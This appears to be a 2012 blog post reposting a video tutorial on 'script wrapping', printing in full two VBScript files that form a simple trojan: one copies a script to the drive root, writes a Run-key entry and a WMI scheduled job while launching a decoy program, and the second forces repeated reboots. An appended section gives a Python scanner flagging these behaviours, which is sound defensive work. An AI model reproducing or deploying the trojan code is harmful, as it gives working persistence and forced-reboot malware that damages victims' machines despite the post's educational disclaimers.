Writing a Virus in VBScript

By | February 3, 2012

Source: YouTube

Suffice it to say that any information I post on this blog concerning any kind of malware is to be used ONLY as a learning resource. You should look at this type of software in a self-contained environment to avoid any damage to yourself or anyone else.

This video will discuss the principle of “Script Wrapping” using the example of a simple VBScript / WMI based Trojan Horse Virus.
This is presented for educational purposes ONLY and should not be used in a malicious fashion. The VBScript code used in this lesson can be found over here:
http://jaysn.blogspot.com/2008/03/learn-windows-scripting-act-3-class.html

The code below is the code referenced in the video.

‘File 1 Romcs.vbs
HKEY_LOCAL_MACHINE = &H80000002
strComputer = “.”
Set WSHShell = CreateObject(“Scripting.FilesystemObject”)
WSHShell.CopyFile “AntiVirusNet.vbs”, “C:\AntiVirusNet.vbs”
Set ObjRegistry = GetObject(“winmgmts:{impersonationLevel = impersonate}!\\” & strComputer & “\root\default:StdRegProv”)
Return = objRegistry.setStringValue(HKEY_LOCAL_MACHINE,”Software\Microsoft\Windows\CurrentVersion\Run”,”WRSPXPBXUpd”,”C:\AntiVirusNet.vbs”)
If Return <> 0 Then
msgbox(“Keine Admin Rights!”)
Else
Set objWMIService1 = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)
Set colComputers3 = objWMIService1.ExecQuery(“Select * from Win32_LocalTime”)
For Each objComputer2 in colComputers3
Hou = objComputer2.Hour
Min = objComputer2.Minute
if Hou < 10 then
Hou = 0 & objComputer2.Hour
end if
next
if Min < 10 then
Min = 0 & objComputer2.Minute
end if
Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)
Set colComputers2 = objWMIService.Get(“Win32_ScheduledJob”)
T = “C:\AntiVirusNet.vbs”
D = “********” & Hou & “” & Min & “00.000000+000”
‘+1 hour automatically
erret = colComputers2.Create(T,D,JobID1000)
Set WSHShell1 = CreateObject(“WScript.Shell”)
WSHShell1.Run “bowling.exe”
‘WSHShell.DeleteFile (“*.vsbs”)
End IF

‘ File 2 AntiVirusNet.vbs
On error resume next
strComputer = “.”
Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)
Set colComputers2 = objWMIService.ExecQuery(“Select * from Win32_OperatingSystem”)
For Each objComputer2 in colComputers2
objComputer2.Security.privileges.AddAsString “SeShutdownPrivilege”, true
errRet = objComputer2.Reboot()
next
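
For analysts triaging scripts like the two above, here is a static indicator scan added as an example (it is not code from the video or the linked post). It flags the behaviours these scripts show: a Run-key write, a Win32_ScheduledJob reference, a forced reboot, and a script copied to a drive root. The labels, regexes and sample lines are this example's own assumptions.

```python
import re

# Curly quotes (as on this page) are normalised so pasted samples still match.
QUOTES = str.maketrans({"\u201c": '"', "\u201d": '"', "\u2018": "'", "\u2019": "'"})

# Behaviours visible in the two scripts above; labels are this example's own.
INDICATORS = {
    "run_key_persistence": re.compile(r"set\w*value\b.*currentversion\\run", re.I),
    "wmi_scheduled_job": re.compile(r"win32_scheduledjob", re.I),
    "forced_reboot": re.compile(r"\.reboot\s*\(|seshutdownprivilege", re.I),
    "script_copied_to_drive_root": re.compile(
        r'copyfile\b.*"[a-z]:\\[^\\"]+\.(?:vbs|vbe|js|wsf)"', re.I),
}

def strip_comment(line):
    """Drop a trailing VBScript comment (an apostrophe outside a string literal)."""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return line[:i]
    return line

def triage(source):
    """Return {label: [line numbers]} for indicators found in live (uncommented) code."""
    hits = {}
    for no, raw in enumerate(source.splitlines(), 1):
        code = strip_comment(raw.translate(QUOTES))
        for label, rx in INDICATORS.items():
            if rx.search(code):
                hits.setdefault(label, []).append(no)
    return hits

# Constructed sample with hypothetical names; fragments only, not a working script.
SAMPLE = "\n".join([
    "' constructed sample for the scanner",
    "' objOS.Reboot() is only mentioned in this comment",
    "fso.CopyFile \u201cupdate.vbs\u201d, \u201cC:\\update.vbs\u201d",
    'reg.SetStringValue HKLM, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Upd", "C:\\update.vbs"',
    'Set job = wmi.Get("Win32_ScheduledJob")',
    'MsgBox "It\'s done"',
])

if __name__ == "__main__":
    for label, lines in triage(SAMPLE).items():
        print(f"{label}: line(s) {lines}")
```

A hit is a reason to look closer, not a verdict: legitimate admin scripts also touch the Run key and scheduled jobs, so review flagged lines in context.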